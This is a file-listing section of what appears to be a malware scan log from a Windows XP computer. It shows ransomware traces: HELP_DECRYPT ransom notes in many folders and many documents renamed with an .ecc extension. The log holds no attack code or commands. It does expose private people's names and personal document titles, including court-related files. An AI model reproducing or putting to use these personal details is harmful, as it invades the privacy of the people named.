2015-02-25 21:10 - 2015-03-01 19:47 - 00001891 _____ () C:\WINDOWS\imsins.log
2015-02-25 21:10 - 2015-03-01 19:47 - 00001555 _____ () C:\WINDOWS\tabletoc.log
2015-02-25 21:10 - 2015-03-01 19:46 - 00001891 _____ () C:\WINDOWS\imsins.BAK
2015-02-24 22:20 - 2015-02-25 03:34 - 87668868 _____ () C:\Documents and Settings\Administrator\Application Data\log.html
2015-02-24 22:20 - 2015-02-25 03:34 - 00000636 _____ () C:\Documents and Settings\Administrator\Application Data\key.dat
2015-02-24 18:07 - 2015-02-24 18:07 - 00000000 ____D () C:\Documents and Settings\Administrator\Local Settings\Application Data\Skype
2015-02-24 17:55 - 2015-02-24 23:13 - 00090148 _____ () C:\WINDOWS\Minidump\Mini022415-01.dmp.ecc
2015-02-23 14:36 - 2015-02-24 22:49 - 00000196 ____H () C:\Documents and Settings\michelle coe\My Documents\~$ther relevant Information.docx.ecc
2015-02-23 14:33 - 2015-02-24 22:34 - 00000196 ____H () C:\Documents and Settings\michelle coe\Desktop\~$BC LOG.docx.ecc
2015-02-23 14:32 - 2015-02-24 22:48 - 00011956 _____ () C:\Documents and Settings\michelle coe\My Documents\Gather relevant Information.docx.ecc
2015-02-23 14:32 - 2015-02-23 14:32 - 00010164 ____H () C:\Documents and Settings\michelle coe\My Documents\~WRL0005.tmp
2015-02-23 12:13 - 2015-02-24 22:34 - 00012020 _____ () C:\Documents and Settings\michelle coe\Desktop\ABC LOG.docx.ecc
2015-02-23 12:13 - 2015-02-23 13:40 - 00011959 ____H () C:\Documents and Settings\michelle coe\Desktop\~WRL3581.tmp
2015-02-22 14:15 - 2015-02-22 14:17 - 00000000 ____D () C:\WINDOWS\system32\MpEngineStore
2015-02-22 12:19 - 2015-03-10 18:27 - 00000830 _____ () C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2015-02-22 12:17 - 2015-02-22 12:17 - 00000000 ____D () C:\Documents and Settings\Administrator\Local Settings\Application Data\Steam
2015-02-22 12:15 - 2015-03-14 12:45 - 00001984 _____ () C:\WINDOWS\error.log
2015-02-22 12:14 - 2015-03-14 12:45 - 00000513 _____ () C:\WINDOWS\errord.log
2015-02-22 11:47 - 2015-02-22 11:47 - 00000535 _____ () C:\WINDOWS\wmsetup.log
2015-02-22 11:44 - 2015-03-14 12:44 - 00000962 _____ () C:\WINDOWS\setupact.log
2015-02-22 11:44 - 2015-02-22 11:44 - 00000000 _____ () C:\WINDOWS\setuperr.log
2015-02-22 11:43 - 2015-03-14 13:06 - 00059362 _____ () C:\WINDOWS\setupapi.log
2015-02-22 05:52 - 2015-03-14 12:48 - 00455357 _____ () C:\WINDOWS\WindowsUpdate.log
2015-02-21 18:18 - 2015-02-24 22:34 - 00076324 _____ () C:\Documents and Settings\michelle coe\Desktop\New Charmagne Westphal- Resume February  2015.doc.ecc
2015-02-21 17:42 - 2015-02-21 17:42 - 00000000 ____D () C:\Documents and Settings\michelle coe\My Documents\New Folder
2015-02-20 19:15 - 2015-03-01 15:14 - 00000000 ___HD () C:\Documents and Settings\All Users\Application Data\{8CCDBBA6-E8EE-4844-9F07-469DCB5F2C87}
2015-02-20 17:15 - 2015-02-20 17:15 - 00008630 _____ () C:\HELP_DECRYPT.HTML
2015-02-20 17:15 - 2015-02-20 17:15 - 00004258 _____ () C:\HELP_DECRYPT.TXT
2015-02-20 17:15 - 2015-02-20 17:15 - 00000292 _____ () C:\HELP_DECRYPT.URL
2015-02-20 17:02 - 2015-02-20 17:02 - 00008630 _____ () C:\Documents and Settings\NetworkService\Local Settings\HELP_DECRYPT.HTML
2015-02-20 17:02 - 2015-02-20 17:02 - 00008630 _____ () C:\Documents and Settings\NetworkService\Local Settings\Application Data\HELP_DECRYPT.HTML
2015-02-20 17:02 - 2015-02-20 17:02 - 00008630 _____ () C:\Documents and Settings\NetworkService\HELP_DECRYPT.HTML
2015-02-20 17:02 - 2015-02-20 17:02 - 00008630 _____ () C:\Documents and Settings\NetworkService\Application Data\HELP_DECRYPT.HTML
2015-02-20 17:02 - 2015-02-20 17:02 - 00008630 _____ () C:\Documents and Settings\michelle coe\My Documents\HELP_DECRYPT.HTML
2015-02-20 17:02 - 2015-02-20 17:02 - 00008630 _____ () C:\Documents and Settings\michelle coe\HELP_DECRYPT.HTML
2015-02-20 17:02 - 2015-02-20 17:02 - 00008630 _____ () C:\Documents and Settings\HELP_DECRYPT.HTML
2015-02-20 17:02 - 2015-02-20 17:02 - 00004258 _____ () C:\Documents and Settings\NetworkService\Local Settings\HELP_DECRYPT.TXT
2015-02-20 17:02 - 2015-02-20 17:02 - 00004258 _____ () C:\Documents and Settings\NetworkService\Local Settings\Application Data\HELP_DECRYPT.TXT
2015-02-20 17:02 - 2015-02-20 17:02 - 00004258 _____ () C:\Documents and Settings\NetworkService\HELP_DECRYPT.TXT
2015-02-20 17:02 - 2015-02-20 17:02 - 00004258 _____ () C:\Documents and Settings\NetworkService\Application Data\HELP_DECRYPT.TXT
2015-02-20 17:02 - 2015-02-20 17:02 - 00004258 _____ () C:\Documents and Settings\michelle coe\My Documents\HELP_DECRYPT.TXT
2015-02-20 17:02 - 2015-02-20 17:02 - 00004258 _____ () C:\Documents and Settings\michelle coe\HELP_DECRYPT.TXT
2015-02-20 17:02 - 2015-02-20 17:02 - 00004258 _____ () C:\Documents and Settings\HELP_DECRYPT.TXT
2015-02-20 17:02 - 2015-02-20 17:02 - 00000292 _____ () C:\Documents and Settings\NetworkService\Local Settings\HELP_DECRYPT.URL
2015-02-20 17:02 - 2015-02-20 17:02 - 00000292 _____ () C:\Documents and Settings\NetworkService\Local Settings\Application Data\HELP_DECRYPT.URL
2015-02-20 17:02 - 2015-02-20 17:02 - 00000292 _____ () C:\Documents and Settings\NetworkService\HELP_DECRYPT.URL
2015-02-20 17:02 - 2015-02-20 17:02 - 00000292 _____ () C:\Documents and Settings\NetworkService\Application Data\HELP_DECRYPT.URL
2015-02-20 17:02 - 2015-02-20 17:02 - 00000292 _____ () C:\Documents and Settings\michelle coe\My Documents\HELP_DECRYPT.URL
2015-02-20 17:02 - 2015-02-20 17:02 - 00000292 _____ () C:\Documents and Settings\michelle coe\HELP_DECRYPT.URL
2015-02-20 17:02 - 2015-02-20 17:02 - 00000292 _____ () C:\Documents and Settings\HELP_DECRYPT.URL
2015-02-20 16:59 - 2015-02-20 16:59 - 00008630 _____ () C:\Documents and Settings\michelle coe\Local Settings\HELP_DECRYPT.HTML
2015-02-20 16:59 - 2015-02-20 16:59 - 00008630 _____ () C:\Documents and Settings\michelle coe\Local Settings\Application Data\HELP_DECRYPT.HTML
2015-02-20 16:59 - 2015-02-20 16:59 - 00004258 _____ () C:\Documents and Settings\michelle coe\Local Settings\HELP_DECRYPT.TXT
2015-02-20 16:59 - 2015-02-20 16:59 - 00004258 _____ () C:\Documents and Settings\michelle coe\Local Settings\Application Data\HELP_DECRYPT.TXT
2015-02-20 16:59 - 2015-02-20 16:59 - 00000292 _____ () C:\Documents and Settings\michelle coe\Local Settings\HELP_DECRYPT.URL
2015-02-20 16:59 - 2015-02-20 16:59 - 00000292 _____ () C:\Documents and Settings\michelle coe\Local Settings\Application Data\HELP_DECRYPT.URL
2015-02-20 15:46 - 2015-02-20 15:46 - 00008630 _____ () C:\Documents and Settings\michelle coe\Application Data\HELP_DECRYPT.HTML
2015-02-20 15:46 - 2015-02-20 15:46 - 00004258 _____ () C:\Documents and Settings\michelle coe\Application Data\HELP_DECRYPT.TXT
2015-02-20 15:46 - 2015-02-20 15:46 - 00000292 _____ () C:\Documents and Settings\michelle coe\Application Data\HELP_DECRYPT.URL
2015-02-20 15:45 - 2015-02-20 15:45 - 00008630 _____ () C:\Documents and Settings\LocalService\Local Settings\HELP_DECRYPT.HTML
2015-02-20 15:45 - 2015-02-20 15:45 - 00008630 _____ () C:\Documents and Settings\LocalService\Local Settings\Application Data\HELP_DECRYPT.HTML
2015-02-20 15:45 - 2015-02-20 15:45 - 00008630 _____ () C:\Documents and Settings\LocalService\HELP_DECRYPT.HTML
2015-02-20 15:45 - 2015-02-20 15:45 - 00004258 _____ () C:\Documents and Settings\LocalService\Local Settings\HELP_DECRYPT.TXT
2015-02-20 15:45 - 2015-02-20 15:45 - 00004258 _____ () C:\Documents and Settings\LocalService\Local Settings\Application Data\HELP_DECRYPT.TXT
2015-02-20 15:45 - 2015-02-20 15:45 - 00004258 _____ () C:\Documents and Settings\LocalService\HELP_DECRYPT.TXT
2015-02-20 15:45 - 2015-02-20 15:45 - 00000292 _____ () C:\Documents and Settings\LocalService\Local Settings\HELP_DECRYPT.URL
2015-02-20 15:45 - 2015-02-20 15:45 - 00000292 _____ () C:\Documents and Settings\LocalService\Local Settings\Application Data\HELP_DECRYPT.URL
2015-02-20 15:45 - 2015-02-20 15:45 - 00000292 _____ () C:\Documents and Settings\LocalService\HELP_DECRYPT.URL
2015-02-20 15:44 - 2015-02-20 15:44 - 00008630 _____ () C:\Documents and Settings\Default User\Local Settings\HELP_DECRYPT.HTML
2015-02-20 15:44 - 2015-02-20 15:44 - 00008630 _____ () C:\Documents and Settings\Default User\Local Settings\Application Data\HELP_DECRYPT.HTML
2015-02-20 15:44 - 2015-02-20 15:44 - 00008630 _____ () C:\Documents and Settings\Default User\HELP_DECRYPT.HTML
2015-02-20 15:44 - 2015-02-20 15:44 - 00008630 _____ () C:\Documents and Settings\Default User\Application Data\HELP_DECRYPT.HTML
2015-02-20 15:44 - 2015-02-20 15:44 - 00008630 _____ () C:\Documents and Settings\All Users\HELP_DECRYPT.HTML
2015-02-20 15:44 - 2015-02-20 15:44 - 00008630 _____ () C:\Documents and Settings\All Users\Application Data\HELP_DECRYPT.HTML
2015-02-20 15:44 - 2015-02-20 15:44 - 00004258 _____ () C:\Documents and Settings\Default User\Local Settings\HELP_DECRYPT.TXT
2015-02-20 15:44 - 2015-02-20 15:44 - 00004258 _____ () C:\Documents and Settings\Default User\Local Settings\Application Data\HELP_DECRYPT.TXT
2015-02-20 15:44 - 2015-02-20 15:44 - 00004258 _____ () C:\Documents and Settings\Default User\HELP_DECRYPT.TXT
2015-02-20 15:44 - 2015-02-20 15:44 - 00004258 _____ () C:\Documents and Settings\Default User\Application Data\HELP_DECRYPT.TXT
2015-02-20 15:44 - 2015-02-20 15:44 - 00004258 _____ () C:\Documents and Settings\All Users\HELP_DECRYPT.TXT
2015-02-20 15:44 - 2015-02-20 15:44 - 00004258 _____ () C:\Documents and Settings\All Users\Application Data\HELP_DECRYPT.TXT
2015-02-20 15:44 - 2015-02-20 15:44 - 00000292 _____ () C:\Documents and Settings\Default User\Local Settings\HELP_DECRYPT.URL
2015-02-20 15:44 - 2015-02-20 15:44 - 00000292 _____ () C:\Documents and Settings\Default User\Local Settings\Application Data\HELP_DECRYPT.URL
2015-02-20 15:44 - 2015-02-20 15:44 - 00000292 _____ () C:\Documents and Settings\Default User\HELP_DECRYPT.URL
2015-02-20 15:44 - 2015-02-20 15:44 - 00000292 _____ () C:\Documents and Settings\Default User\Application Data\HELP_DECRYPT.URL
2015-02-20 15:44 - 2015-02-20 15:44 - 00000292 _____ () C:\Documents and Settings\All Users\HELP_DECRYPT.URL
2015-02-20 15:44 - 2015-02-20 15:44 - 00000292 _____ () C:\Documents and Settings\All Users\Application Data\HELP_DECRYPT.URL
2015-02-20 15:37 - 2015-02-22 14:15 - 00000000 ____D () C:\WINDOWS\FrameworkUpdate
2015-02-20 15:37 - 2015-02-20 15:37 - 00000480 ____H () C:\Documents and Settings\michelle coe\Application Data\麽鎒駓覜
2015-02-19 22:27 - 2015-02-19 22:27 - 00202208 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgidsdriverlx.sys
2015-02-17 16:04 - 2015-02-17 16:04 - 01202848 _____ (Microsoft Corporation) C:\WINDOWS\system32\FM20.DLL
2015-02-16 08:49 - 2015-02-24 22:34 - 00121668 _____ () C:\Documents and Settings\michelle coe\Desktop\INCLUSIVE-SCHOOLS-Survey-Charmagne Westphal 2015.doc.ecc
2015-02-16 08:47 - 2015-02-24 22:34 - 00050724 _____ () C:\Documents and Settings\michelle coe\Desktop\INCLUSIVE-SCHOOLS-Survey-Charmagne Westphal 2015.docx.ecc
2015-02-16 05:46 - 2015-02-24 22:34 - 00050724 _____ () C:\Documents and Settings\michelle coe\Desktop\INCLUSIVE-SCHOOLS-Survey-DIRECTIONS-template-rubric-1.docRevised2015 (3).docx.ecc
2015-02-16 05:33 - 2015-02-24 22:34 - 00104260 _____ () C:\Documents and Settings\michelle coe\Desktop\INCLUSIVE-SCHOOLS-Survey-DIRECTIONS-template-rubric-1.docRevised2015 (2).doc.ecc
2015-02-16 05:31 - 2015-02-24 22:34 - 00042564 _____ () C:\Documents and Settings\michelle coe\Desktop\INCLUSIVE-SCHOOLS-Survey-DIRECTIONS-template-rubric-1.docRevised2015 (2).docx.ecc

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2015-03-14 13:07 - 2014-03-07 00:19 - 00000000 ____D () C:\Documents and Settings\Administrator\Local Settings\temp
2015-03-14 13:06 - 2014-09-11 10:10 - 00000398 _____ () C:\WINDOWS\Tasks\MsgUpdateCheck (de5e9f60-5adf-404f-9048-3ab8bfd91685).job
2015-03-14 13:01 - 2009-12-10 22:00 - 00000886 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2015-03-14 12:51 - 2011-02-18 16:03 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\MFAData
2015-03-14 12:51 - 2009-08-09 14:59 - 00846968 _____ () C:\WINDOWS\system32\PerfStringBackup.INI
2015-03-14 12:47 - 2015-02-02 17:15 - 00000000 ____D () C:\Documents and Settings\Administrator\Application Data\ViberPC
2015-03-14 12:47 - 2015-02-02 17:05 - 00000000 ____D () C:\Documents and Settings\Administrator\Local Settings\Application Data\Viber
2015-03-14 12:47 - 2010-08-04 21:00 - 00131072 _____ () C:\WINDOWS\system32\config\WindowsPowerShell.evt
2015-03-14 12:46 - 2014-09-11 10:10 - 00000476 _____ () C:\WINDOWS\Tasks\SDMsgUpdate (Local).job
2015-03-14 12:46 - 2014-09-11 10:10 - 00000468 _____ () C:\WINDOWS\Tasks\SDMsgUpdate (TE).job
2015-03-14 12:46 - 2014-03-31 13:15 - 00000236 _____ () C:\WINDOWS\Tasks\Microsoft Windows XP End of Service Notification Logon.job
2015-03-14 12:46 - 2014-03-10 21:09 - 00000261 _____ () C:\WINDOWS\wiadebug.log
2015-03-14 12:46 - 2009-12-10 22:00 - 00000882 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2015-03-14 12:46 - 2009-08-09 21:42 - 00216218 _____ () C:\WINDOWS\system32\nvapps.xml
2015-03-14 12:46 - 2006-02-28 08:00 - 00013646 _____ () C:\WINDOWS\system32\wpa.dbl
2015-03-14 12:45 - 2014-03-10 21:09 - 00000049 _____ () C:\WINDOWS\wiaservc.log
2015-03-14 12:45 - 2009-08-09 19:38 - 00000006 ____H () C:\WINDOWS\Tasks\SA.DAT
2015-03-10 19:18 - 2014-03-10 21:08 - 00032510 _____ () C:\WINDOWS\SchedLgU.Txt
2015-03-10 19:18 - 2011-02-26 17:31 - 00001954 _____ () C:\WINDOWS\epplauncher.mif
2015-03-10 19:18 - 2009-08-09 19:39 - 00000178 ___SH () C:\Documents and Settings\Administrator\ntuser.ini
2015-03-10 18:28 - 2012-05-06 09:30 - 00000000 ____D () C:\Program Files\Mozilla Maintenance Service
2015-03-10 18:12 - 2009-08-10 00:28 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Microsoft Help
2015-03-10 18:11 - 2013-07-14 18:00 - 00000000 ____D () C:\WINDOWS\system32\MRT
2015-03-10 18:04 - 2009-08-09 20:17 - 119837696 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2015-03-10 15:40 - 2014-09-20 15:40 - 00000302 _____ () C:\WINDOWS\Tasks\PC Performer Scheduled Scan.job
2015-03-05 19:24 - 2010-04-27 20:13 - 00000000 ____D () C:\WINDOWS\system32\NtmsData
2015-03-05 18:48 - 2009-12-24 10:22 - 00000000 ____D () C:\Documents and Settings\Administrator\Desktop\Unused files
2015-03-03 17:12 - 2011-10-13 09:27 - 00000000 ____D () C:\Documents and Settings\michelle coe\Application Data\Skype
2015-03-03 00:58 - 2014-03-07 00:19 - 00000000 ____D () C:\Documents and Settings\michelle coe\Local Settings\temp
2015-03-02 15:54 - 2009-12-20 12:16 - 00000000 ____D () C:\Documents and Settings\Administrator\Start Menu\Programs\Steam
2015-03-02 15:29 - 2009-08-09 19:23 - 00000000 ____D () C:\WINDOWS\system32\DirectX
2015-03-02 15:15 - 2009-09-06 12:10 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\Activision
2015-03-01 19:49 - 2015-02-04 14:58 - 00002265 _____ () C:\Documents and Settings\All Users\Desktop\Skype.lnk
2015-03-01 19:49 - 2015-02-04 14:58 - 00000000 ___RD () C:\Program Files\Skype
2015-03-01 19:49 - 2015-02-04 14:58 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\Skype
2015-03-01 19:49 - 2009-10-10 06:29 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Skype
2015-03-01 16:32 - 2014-09-20 15:40 - 00000000 ____D () C:\Program Files\MyPC Backup
2015-03-01 13:15 - 2009-08-09 19:22 - 00000000 ____D () C:\WINDOWS\system32\Restore
2015-02-26 20:29 - 2009-10-10 06:29 - 00000000 ____D () C:\Documents and Settings\Administrator\Application Data\Skype
2015-02-26 19:29 - 2010-07-23 07:34 - 00001324 _____ () C:\WINDOWS\system32\d3d9caps.dat
2015-02-25 02:59 - 2009-08-09 14:47 - 00000000 ____D () C:\WINDOWS\system32\ias
2015-02-25 02:59 - 2009-02-12 22:20 - 00005652 _____ () C:\WINDOWS\system32\IE8Eula.rtf.ecc
2015-02-25 02:59 - 2006-02-28 08:00 - 00039828 _____ () C:\WINDOWS\system32\eula.txt.ecc
2015-02-25 02:59 - 2006-02-28 08:00 - 00000676 _____ () C:\WINDOWS\system32\Drivers\gmreadme.txt.ecc
2015-02-24 23:13 - 2011-01-25 17:41 - 00000000 ____D () C:\WINDOWS\Minidump
2015-02-24 23:13 - 2009-08-09 14:55 - 01089572 _____ () C:\WINDOWS\system32\config\software.sav.ecc
2015-02-24 23:13 - 2009-08-09 14:55 - 00917540 _____ () C:\WINDOWS\system32\config\system.sav.ecc
2015-02-24 23:13 - 2009-08-09 14:55 - 00094244 _____ () C:\WINDOWS\system32\config\default.sav.ecc
2015-02-24 23:12 - 2012-12-02 16:11 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2761226$
2015-02-24 23:12 - 2012-12-02 16:11 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2727528$
2015-02-24 23:12 - 2012-06-13 18:13 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2707511$
2015-02-24 23:12 - 2012-06-13 18:01 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2709162$
2015-02-24 23:12 - 2012-06-12 19:45 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2685939$
2015-02-24 23:12 - 2012-06-04 18:00 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2718704$
2015-02-24 23:12 - 2012-05-11 09:03 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2686509$
2015-02-24 23:12 - 2012-05-11 09:02 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2695962$
2015-02-24 23:12 - 2012-05-11 08:57 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2676562$
2015-02-24 23:12 - 2010-02-11 16:52 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB978262$
2015-02-24 23:12 - 2010-02-11 16:52 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB971468$
2015-02-24 23:12 - 2010-02-11 16:50 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB978251$
2015-02-24 23:12 - 2010-02-11 16:50 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB978037$
2015-02-24 23:12 - 2010-02-11 16:50 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB975713$
2015-02-24 23:12 - 2010-02-11 16:50 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB975560$
2015-02-24 23:12 - 2010-02-11 16:49 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB978706$
2015-02-24 23:12 - 2010-02-11 16:49 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB977914$
2015-02-24 23:12 - 2010-02-11 16:49 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB977165$
2015-02-24 23:11 - 2014-09-20 15:42 - 00000000 ____D () C:\Program Files\SearchProtect
2015-02-24 23:11 - 2014-09-20 15:41 - 00000000 ____D () C:\Program Files\Speed Test
2015-02-24 23:11 - 2014-03-09 15:22 - 00123780 _____ () C:\TDSSKiller.3.0.0.25_09.03.2014_15.22.41_log.txt.ecc
2015-02-24 23:11 - 2014-03-09 15:21 - 00087236 _____ () C:\TDSSKiller.2.8.16.0_09.03.2014_15.21.44_log.txt.ecc
2015-02-24 23:11 - 2014-03-09 15:21 - 00005076 _____ () C:\TDSSKiller.3.0.0.25_09.03.2014_15.21.06_log.txt.ecc
2015-02-24 23:11 - 2014-03-09 15:20 - 00000676 _____ () C:\TDSSKiller.2.8.16.0_09.03.2014_15.20.24_log.txt.ecc
2015-02-24 23:11 - 2014-03-08 17:01 - 00000000 ____D () C:\VIPRERESCUE
2015-02-24 23:11 - 2011-02-26 17:54 - 00000000 ____D () C:\Qoobox
2015-02-24 23:11 - 2009-08-23 11:28 - 00000000 ____D () C:\Program Files\RealFlight Add-ons Volume 2
2015-02-24 23:11 - 2009-08-09 21:41 - 00000000 ____D () C:\Program Files\Windows Media Connect 2
2015-02-24 23:10 - 2014-10-15 12:57 - 00000000 ____D () C:\Program Files\EliteUnzip
2015-02-24 23:10 - 2014-09-20 15:42 - 00000000 ____D () C:\Program Files\ffdshow
2015-02-24 23:10 - 2010-07-22 17:50 - 00000000 ____D () C:\Program Files\Malwarebytes' Anti-Malware
2015-02-24 23:10 - 2009-10-09 18:00 - 00000000 ____D () C:\Program Files\Microsoft CAPICOM 2.1.0.2
2015-02-24 22:50 - 2014-01-26 13:44 - 00000000 ____D () C:\OETemp
2015-02-24 22:50 - 2012-01-28 17:09 - 00000000 ____D () C:\Malaysia photos
2015-02-24 22:49 - 2015-01-28 11:07 - 00010820 _____ () C:\Documents and Settings\michelle coe\My Documents\Personal Statement fos Scholarship 2015.docx.ecc
2015-02-24 22:49 - 2015-01-21 13:22 - 00025076 _____ () C:\Documents and Settings\michelle coe\My Documents\KWL%20Chart%20First%20Session%20Class%20Activity[1].docx.ecc
2015-02-24 22:49 - 2014-12-03 17:50 - 00013972 _____ () C:\Documents and Settings\michelle coe\My Documents\MARS PROJECT OVERVIEW.docx.ecc
2015-02-24 22:49 - 2014-11-12 18:27 - 00017908 _____ () C:\Documents and Settings\michelle coe\My Documents\LESSON PLAN FORMAT.docx.ecc
2015-02-24 22:49 - 2014-10-15 11:35 - 02713572 _____ () C:\Documents and Settings\michelle coe\My Documents\THE LIFECYCLE OF THE BUTTERFLY.pptx.ecc
2015-02-24 22:49 - 2014-10-09 09:55 - 00015092 _____ () C:\Documents and Settings\michelle coe\My Documents\Software Evaluation.docx.ecc
2015-02-24 22:49 - 2014-09-17 19:27 - 00011396 _____ () C:\Documents and Settings\michelle coe\My Documents\Kingsley.docx.ecc
2015-02-24 22:49 - 2014-09-17 19:25 - 00012692 _____ () C:\Documents and Settings\michelle coe\My Documents\PDF digital media.docx.ecc
2015-02-24 22:49 - 2014-07-29 07:09 - 00018820 _____ () C:\Documents and Settings\michelle coe\My Documents\NEIGHBORHOOD MAPS incomplete.docx.ecc
2015-02-24 22:49 - 2014-07-28 17:52 - 00013268 _____ () C:\Documents and Settings\michelle coe\My Documents\Microboards.docx.ecc
2015-02-24 22:49 - 2014-07-27 10:47 - 00015172 _____ () C:\Documents and Settings\michelle coe\My Documents\WISD Reportl.docx.ecc
2015-02-24 22:49 - 2014-07-26 23:02 - 00019140 _____ () C:\Documents and Settings\michelle coe\My Documents\Skyline High School Map.docx.ecc
2015-02-24 22:49 - 2014-07-26 21:31 - 00012228 _____ () C:\Documents and Settings\michelle coe\My Documents\NEIGHBORHOOD MAP.docx.ecc
2015-02-24 22:49 - 2014-07-26 17:28 - 00018692 _____ () C:\Documents and Settings\michelle coe\My Documents\NEIGHBORHOOD MAPS.docx.ecc
2015-02-24 22:49 - 2014-07-19 14:48 - 00015812 _____ () C:\Documents and Settings\michelle coe\My Documents\Ruby Bridges Story.docx.ecc
2015-02-24 22:49 - 2014-07-17 10:27 - 00013364 _____ () C:\Documents and Settings\michelle coe\My Documents\Universal Design Article.docx.ecc
2015-02-24 22:49 - 2014-07-07 10:45 - 00014740 _____ () C:\Documents and Settings\michelle coe\My Documents\Peterson and Neuville ch 3.docx.ecc
2015-02-24 22:49 - 2014-07-01 12:09 - 00018612 _____ () C:\Documents and Settings\michelle coe\My Documents\Journal.docx.ecc
2015-02-24 22:49 - 2014-06-29 22:54 - 00014148 _____ () C:\Documents and Settings\michelle coe\My Documents\websites for special education assignment.docx.ecc
2015-02-24 22:49 - 2014-03-09 00:10 - 00000000 ____D () C:\EEK
2015-02-24 22:48 - 2015-01-22 10:51 - 00013604 _____ () C:\Documents and Settings\michelle coe\My Documents\Assignment 1.docx.ecc
2015-02-24 22:48 - 2014-12-17 07:18 - 00013140 _____ () C:\Documents and Settings\michelle coe\My Documents\Court Date 2014.docx.ecc
2015-02-24 22:48 - 2014-12-07 18:52 - 00015380 _____ () C:\Documents and Settings\michelle coe\My Documents\Charmagne Westphal Writing analysis perceptual.docx.ecc
2015-02-24 22:48 - 2014-10-23 12:18 - 00012644 _____ () C:\Documents and Settings\michelle coe\My Documents\Charmagne Westphal The seventh standard and related proficiencies.docx.ecc
2015-02-24 22:48 - 2014-10-21 10:03 - 00012548 _____ () C:\Documents and Settings\michelle coe\My Documents\Charmagne Westphal reflection #5.docx.ecc
2015-02-24 22:48 - 2014-10-14 11:24 - 00014436 _____ () C:\Documents and Settings\michelle coe\My Documents\Charmagne Westphal Video 4.docx.ecc
2015-02-24 22:48 - 2014-10-11 15:08 - 00013652 _____ () C:\Documents and Settings\michelle coe\My Documents\Hypothesis Testing Sheet Charmagne Westphal.docx.ecc
2015-02-24 22:48 - 2014-10-07 13:03 - 00012868 _____ () C:\Documents and Settings\michelle coe\My Documents\Charmagne Westphal video reflection #3.docx.ecc
2015-02-24 22:48 - 2014-09-30 10:48 - 00013588 _____ () C:\Documents and Settings\michelle coe\My Documents\Charmagne Westphal Video relection #2.docx.ecc
2015-02-24 22:48 - 2014-09-24 09:28 - 00012532 _____ () C:\Documents and Settings\michelle coe\My Documents\Charmagne Westphal-Inspiration software.docx.ecc
2015-02-24 22:48 - 2014-09-23 09:52 - 00014004 _____ () C:\Documents and Settings\michelle coe\My Documents\Charmagne Westphal-Video Reflection #1.docx.ecc
2015-02-24 22:48 - 2014-09-18 09:45 - 00015444 _____ () C:\Documents and Settings\michelle coe\My Documents\Charmagne Westphal Educational Technology.docx.ecc
2015-02-24 22:48 - 2014-09-11 21:11 - 00011636 _____ () C:\Documents and Settings\michelle coe\My Documents\Charmagne Westphal desk top publishing.docx.ecc
2015-02-24 22:48 - 2014-09-10 14:39 - 00011860 _____ () C:\Documents and Settings\michelle coe\My Documents\Charmagne Westphal Creative Common.docx.ecc
2015-02-24 22:48 - 2014-09-10 13:57 - 00012260 _____ () C:\Documents and Settings\michelle coe\My Documents\Charmagne Westphal Web Browser assignment.docx.ecc
2015-02-24 22:48 - 2014-08-20 08:48 - 00011028 _____ () C:\Documents and Settings\michelle coe\My Documents\Charmagne Westphal Volunteer Services.docx.ecc
2015-02-24 22:48 - 2014-08-12 06:48 - 00018308 _____ () C:\Documents and Settings\michelle coe\My Documents\Charmagne Westphal SED 5030 final Exam.docx.ecc
2015-02-24 22:48 - 2014-08-04 11:43 - 00013620 _____ () C:\Documents and Settings\michelle coe\My Documents\add ons for interrogatories.docx.ecc
2015-02-24 22:48 - 2014-08-03 16:39 - 00013364 _____ () C:\Documents and Settings\michelle coe\My Documents\Charmagne Westphal journal 8.docx.ecc
2015-02-24 22:48 - 2014-08-02 11:50 - 00014868 _____ () C:\Documents and Settings\michelle coe\My Documents\Charmagne Westphal interview with a parent.docx.ecc
2015-02-24 22:48 - 2014-08-02 11:15 - 00013428 _____ () C:\Documents and Settings\michelle coe\My Documents\Charmagne Westphal Interview with special education teacher.docx.ecc
2015-02-24 22:48 - 2014-08-02 09:41 - 00013684 _____ () C:\Documents and Settings\michelle coe\My Documents\Charmagne Westphal Ruby Bridges redo.docx.ecc
2015-02-24 22:48 - 2014-07-31 13:25 - 00012308 _____ () C:\Documents and Settings\michelle coe\My Documents\Charmagne Westphal Chapter article summary.docx.ecc
2015-02-24 22:48 - 2014-07-31 13:15 - 00012292 _____ () C:\Documents and Settings\michelle coe\My Documents\Charmagne Westphal Chapterarticle summary.docx.ecc
2015-02-24 22:48 - 2014-07-31 09:32 - 00014740 _____ () C:\Documents and Settings\michelle coe\My Documents\Charmagne Westphal Journal 7.docx.ecc
2015-02-24 22:48 - 2014-07-29 08:18 - 00015172 _____ () C:\Documents and Settings\michelle coe\My Documents\ANN ARBOR NEIGHBORHOOD.docx.ecc
2015-02-24 22:48 - 2014-07-27 21:24 - 00019140 _____ () C:\Documents and Settings\michelle coe\My Documents\Charmagne Westphal Reflection Paper.docx.ecc
